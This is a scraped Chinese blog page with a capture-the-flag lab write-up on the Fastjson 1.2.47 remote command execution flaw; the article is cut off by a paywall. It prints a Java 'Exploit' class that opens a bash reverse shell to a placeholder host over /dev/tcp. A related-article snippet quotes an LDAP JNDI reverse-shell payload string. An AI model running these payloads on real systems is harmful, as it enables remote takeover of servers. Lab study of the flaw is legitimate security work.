【漏洞靶场】--Fastjson 1.2.47 远程命令执行漏洞

最新推荐文章于 2025-02-28 03:19:59 发布
最新推荐文章于 2025-02-28 03:19:59 发布
阅读量395 收藏
点赞数
分类专栏: BMZCTF 文章标签: 安全 java linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41152432/article/details/122346154
版权

漏洞环境

在这里插入图片描述

exp准备

将如下Java代码编译成class字节码。

import java.io.BufferedReader;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
 
public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/7777;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
 
        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }
 
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }
 
    public static void
最低0.47元/天 解锁文章
FASTJSON反序列化(靶场复现)
m0_66376444的博客
04-06 743
FASTJSON反序列化漏洞复现,fastjson的各个版本payload虽有区别,但是漏洞利用是一样的
复现Fastjson 1.2.47 远程命令执行漏洞
qq_54713392的博客
05-14 1358
复现Fastjson 1.2.47 远程命令执行漏洞 漏洞原理: Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 攻击机:window 10 IP地址192.168.32.1 靶机:ubantu 16.04 IP地址192.168.32.142 攻击步骤: (1)开启Fastjson
java执行脚本语言demo
Coder_android
11-11 1075
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime.get
Fastjson 1.2.47反序列化远程代码执行(CNVD-2019-22238)
最新发布
Long___Xiao的博客
02-28 542
如果这些特定方法中存在可被恶意利用的逻辑(通常被称为“Gadget”),那么攻击者就可能利用这些逻辑执行恶意代码,从而导致严重的安全问题。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。“dataSourceName”: “ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}”,
Fastjson靶场
王嘟嘟的博客
02-14 1071
花了一点时间,搞了一个Fastjson靶场,主要目的是为了测试payload,以及方便后来者做一些练习。
Fastjson反序列化漏洞靶场搭建复现)
hovcfuti的博客
10-10 1427
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
vulfocus fastjson打靶
qq_18811919的博客
01-10 413
vulfocus/fastjson-cnvd_2017_02833:latest打靶
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
总结,面对Fastjson 1.2.47远程代码执行漏洞,及时升级到安全版本是首要任务,同时结合其他防御措施,可以大大提高系统的安全性。作为开发者,我们应该时刻保持警惕,不断学习和了解最新的安全威胁,以应对可能出现...
fastjson 1.2.47漏洞复现实战(vulfocus在线靶场CNVD-2017-02833)——关注紫灵小姐姐不踩坑】
weixin_40416851的博客
08-28 1217
fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,即可构造出一些恶意利用链。...............
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3550
Fastjson 1.2.47反序列化漏洞复现
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5473
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
java脚本语言
08-20
介绍java编写网页的语法代码,方便读者查询。
vulhub靶场训练-fastjson漏洞
m0_67284865的博客
08-16 405
(51条消息) 关于fastjson 漏洞原理分析_fastjson漏洞原理_life1024的博客-优快云博客Fastjson 是一个Java 库,可以将Java 对象转换为 JSON 格式,当然它也可以将]SON 字符申转换为Java 对象Fastjson 可以操作任何Java 对象,即使是一些预先存在的没有源码的对象。
Fastjson反序列化漏洞
mingyqf的博客
12-03 533
原文链接:https://blog.csdn.net/Curry197/article/details/125090159Curry197 已于 2022-06-01 21:22:57 修改 2786 收藏 2 分类专栏: 漏洞复现 文章标签: 安全 web安全 网络 版权 漏洞复现 专栏收录该内容 2 篇文章 0 订阅 订阅专栏参考链接:fastjson 1.2.24 反序列化 RCE 漏洞复现(CVE-2017-18349)_GeekCoderBrick的博客-优快云博客_fastjson反序列化漏洞
java运行脚本语言demo
weixin_34150224的博客
01-24 104
public class Test { /** * @param args * @throws IOException  */ public static void main(String[] args) throws IOException { // TODO Auto-generated method stub Process  process = Runtime...
Vulhub:Fastjson[漏洞复现]
如有错误感谢斧正
12-15 925
在特定条件下调用这些类的公共方法。如果一个。
【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 2181
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
fastjson jar包_fastjson反序列化漏洞复现分析
weixin_39874366的博客
11-30 243
今天老大突然安排我一个很有意思的问题,需要测试一下关于fastjson反序列化漏洞的问题。(因为项目里面有用到!!) 首先网上查阅了下资料:漏洞危害:严重 危 危 危。。。FastJson最新(2019年6月)爆出的绕过方法可以通杀1.2.48版本以下所有,有传言在autotype开启...
Fastjson漏洞复现
Sunnet的博客
01-06 789
前言 靶场使用的是docker + vulhub,由于kali自带是jdk版本为11,而本次环境需要使用jdk8版本,且版本不能低于8u121。在使用mvn clean package -DskipTests命令的时候,需要使用maven,kali中没有maven,需要手动安装。 环境搭建 安装java环境 下载地址:https://github.com/frekele/oracle-java/releases,下载jdk-8u221-linux-x64.tar.gz 1.卸载kali自带的java环境,重
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值